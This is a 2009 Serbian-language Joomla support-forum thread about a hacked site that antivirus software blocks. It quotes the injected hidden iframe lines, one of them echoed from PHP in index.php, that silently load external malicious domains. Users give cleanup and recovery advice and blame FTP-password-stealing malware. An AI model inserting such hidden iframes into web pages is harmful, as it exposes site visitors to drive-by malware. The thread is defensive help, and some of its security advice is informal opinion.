Nod32 blokira sajt

Moderators: cicans, TheHacker

Locked
evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Nod32 blokira sajt

Post by evilmc » Sun Apr 19, 2009 10:17 pm

untitled.PNG
da li je ovo do mene ili stvarno na hostu imam ubacen virus?
You do not have the required permissions to view the files attached to this post.
Last edited by evilmc on Mon Apr 20, 2009 4:42 pm, edited 1 time in total.
http://www.serbianunderground.com / srpski hip-hop portal

User avatar
dmd
Joomla! Guru
Joomla! Guru
Posts: 510
Joined: Tue Aug 14, 2007 10:56 am

Re: Nod32 blokira sajt

Post by dmd » Mon Apr 20, 2009 12:19 am

Imaš.
Izbaci (verovatno u index.php-u) zadnju liniju koda:

<iframe src="http://..."></iframe>

evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Re: Nod32 blokira sajt

Post by evilmc » Mon Apr 20, 2009 9:34 am

ovo su mi zadnje linije u index.php

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
sta tacno da izbrisem?

a ovo mi je u forumu za index.php

Code: Select all

//
// Generate the page
//
$template->pparse('body');

include($phpbb_root_path . 'includes/page_tail.'.$phpEx);



echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>
http://www.serbianunderground.com / srpski hip-hop portal

sofija
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Sun Apr 19, 2009 9:22 pm
Location: beograd
Contact:

Re: Nod32 blokira sajt

Post by sofija » Mon Apr 20, 2009 9:59 am

Pa izbaci cledece linije"

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Code: Select all

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.

evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Re: Nod32 blokira sajt

Post by evilmc » Mon Apr 20, 2009 11:49 am

sofija wrote:I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.
sajt mi je star godinu ipo i do sada nisam imao nikakvih problema...ovi frejmovi mi nisu u template, vec u root fajlovima od joomle, kao i u folderu FORUM gde su mi takodje skoro svi fajlovi zarazeni...tako da sada jedino resenje ostaje da skinem kod sebe fajlove i da skeniram sve...
http://www.serbianunderground.com / srpski hip-hop portal

User avatar
cicans
Joomla! Hero
Joomla! Hero
Posts: 2244
Joined: Fri Oct 12, 2007 10:31 am
Location: Novi Sad, Serbia
Contact:

Re: Nod32 blokira sajt

Post by cicans » Mon Apr 20, 2009 12:38 pm

Pogledaj u temu http://forum.joomla.org/viewtopic.php?f ... e#p1511209
Detaljno je objasnjeno - i provereno! ;)
Blog: http://www.kuvarancije.com/
Serbian Joomla!® Translation Team Coordinator http://www.joomla-serbia.com/
Follow me on Twitter @cicans - Svetlana Zec

Kayz
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 150
Joined: Sun Mar 16, 2008 5:41 pm
Location: London

Re: Nod32 blokira sajt

Post by Kayz » Mon Apr 20, 2009 12:45 pm

Hello I have same problem on the same day, same thing happened to me.

Sorry i dont understand your language, anybody speak english and can help me?

Hacker put

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

In my index file, how they hack?

User avatar
cicans
Joomla! Hero
Joomla! Hero
Posts: 2244
Joined: Fri Oct 12, 2007 10:31 am
Location: Novi Sad, Serbia
Contact:

Re: Nod32 blokira sajt

Post by cicans » Mon Apr 20, 2009 12:57 pm

Blog: http://www.kuvarancije.com/
Serbian Joomla!® Translation Team Coordinator http://www.joomla-serbia.com/
Follow me on Twitter @cicans - Svetlana Zec

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Nod32 blokira sajt

Post by Vrlo Jak Tim » Mon Apr 20, 2009 12:59 pm

Hello Kayz, there is a dozen ways how they could did it.

What you can do now is to:
- change your admin/FTP username/pass,
- download full backup of your site to your PC
- check every file if there are anywhere else those <iframe> codes
- get rid of such codes / suspicious files
- be sure that your site works locally
- upload it back to server and keep all folders permissions to 755, files to 644; do some more research about Security on this forum, and implement some protections.

Maybe the source of problem is not on your account on server, but on server itself.
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Re: Nod32 blokira sajt

Post by evilmc » Mon Apr 20, 2009 4:42 pm

sredio sam...srecom sam imao backup od fajlova i sve vratio i povezao sa bazom i sada je sve kul...
hvala svima.
http://www.serbianunderground.com / srpski hip-hop portal

evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Re: Nod32 blokira sajt

Post by evilmc » Mon Apr 20, 2009 7:27 pm

ponovo mi napali sajt :S
ja ne znam vise sta da radim :S
nije proslo ni 3-4 sata od kako sam ga sredio :/
http://www.serbianunderground.com / srpski hip-hop portal

User avatar
vuperda
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 168
Joined: Thu Apr 19, 2007 9:32 am
Location: Uzice
Contact:

Re: Nod32 blokira sajt

Post by vuperda » Fri Jun 12, 2009 9:52 pm

Meni je masa sajtova pala ne od strane servera i komponenti, nego sto je moj sistem bio krsh, znaci antivirus nije bio azuran i rootkit atack je lako uradio FTP leach, posle nema veze kakav je server ili joomla ili bilo sta drugo, to me naucilo da drzim stvari sigurne kod sebe, 100 nekih zastita sada imam i sve radi ok, srecom sam imao sve azurne backupe pa je restore bio brz i posle toga reset lozinki je resio stvari.... Mislim da taj sistem find/replace kroz fajlove ne bi tako lako radio, zato je backup stvarno spas u svakom slucaju.
Weil eigentlich ist dieses Leben etwas Hässliches.
Ich hasse es, also nehme ich und zerbreche ich es.

evilmc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 182
Joined: Wed Apr 02, 2008 8:52 pm
Location: Krusevac
Contact:

Re: Nod32 blokira sajt

Post by evilmc » Sat Jun 13, 2009 12:16 am

bio je napad na server, ja sam bio svo vreme ubeđen da mi je neko napao sajt i forum :/
morao sam da obrišem sve sa hosta, i posle ubacio stari backup i stanje se stabilozovalo.
http://www.serbianunderground.com / srpski hip-hop portal

arsago
Joomla! Intern
Joomla! Intern
Posts: 93
Joined: Sat Jul 28, 2007 3:52 pm
Contact:

Re: Nod32 blokira sajt

Post by arsago » Sat Jul 25, 2009 7:34 pm

Pozdrav svima :)

Evo da se ukljucim i ja jer sam pre nekoliko meseci imao isti problem i to na svim mojim sajtovima.
Problem nije do joomle ili do servea,vec do ftp programa.Ako koristite neki ftp program za prebacivanje fajlova na server (ja sam koristio total commander) , onda imate veliki problem.
Pokupite virus na svoj komp i taj virus ukrade vas username i password iz ftp programa i onda automatski posalje virus na vas server i u sve index fajlove ubaci skriveni iframe ka sajtovima sa virusima.Takodje se ovaj kod ubacuje i u fajlove deafult.php.
Meni kad je se prvi put to desilo i to na svim sajtovima,ja sam vratio sve u normalu za kratko vreme jer sam imao backup ali posle nekoliko sati obidjem sajtove i opet na svim sajtovima virusi.
Kad sam ukapirao sta se desava onda sam izbacio ftp program iz upotrebe,otisao u direct admin i promenio sve passworde i od tada nemam vise problema.
Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.

Nadam se da sam nekome pomogao sa ovim mojim iskustvom.

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Nod32 blokira sajt

Post by Leftfield » Sat Jul 25, 2009 7:47 pm

arsago wrote:Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.
Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.
Real Estate Budva https://realestatebudva.com

User avatar
vuperda
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 168
Joined: Thu Apr 19, 2007 9:32 am
Location: Uzice
Contact:

Re: Nod32 blokira sajt

Post by vuperda » Mon Jul 27, 2009 5:46 pm

Leftfield wrote: Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.
To vecini ljudi nece biti izvodljivo iz raznoraznih razloga jos dugo vremena...
Postoji i jedna zanimljiva solucija, portable FTP klijenti, oni samim tim nisu registrovani u sistemu tako da ih po zarazi sistema nije moguce tako lako detektovati, zapravo je najbolje preci na sve portabilne verzije, bilo FTP ili drugih programa...

User avatar
Leftfield
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4432
Joined: Fri Dec 08, 2006 3:33 am
Contact:

Re: Nod32 blokira sajt

Post by Leftfield » Mon Jul 27, 2009 9:46 pm

Opet cemo jedno te isto. Jok. Ni to nije sigurno.

Najsigurnija stvar, tj. najbolja opcija je trenutno jxplorer ili neka komponenta koja se instalira na sajtu pa se vuku fajlovi pomocu nje. Ostalo a da valja je *nix.

Da li vecini odgovara ili ne? O tome necu da vodim polemiku. Ako ti je potrebno onda moraš a ako nije onda plaćaj i trpi.
Real Estate Budva https://realestatebudva.com


Locked

Return to “Bezbednost”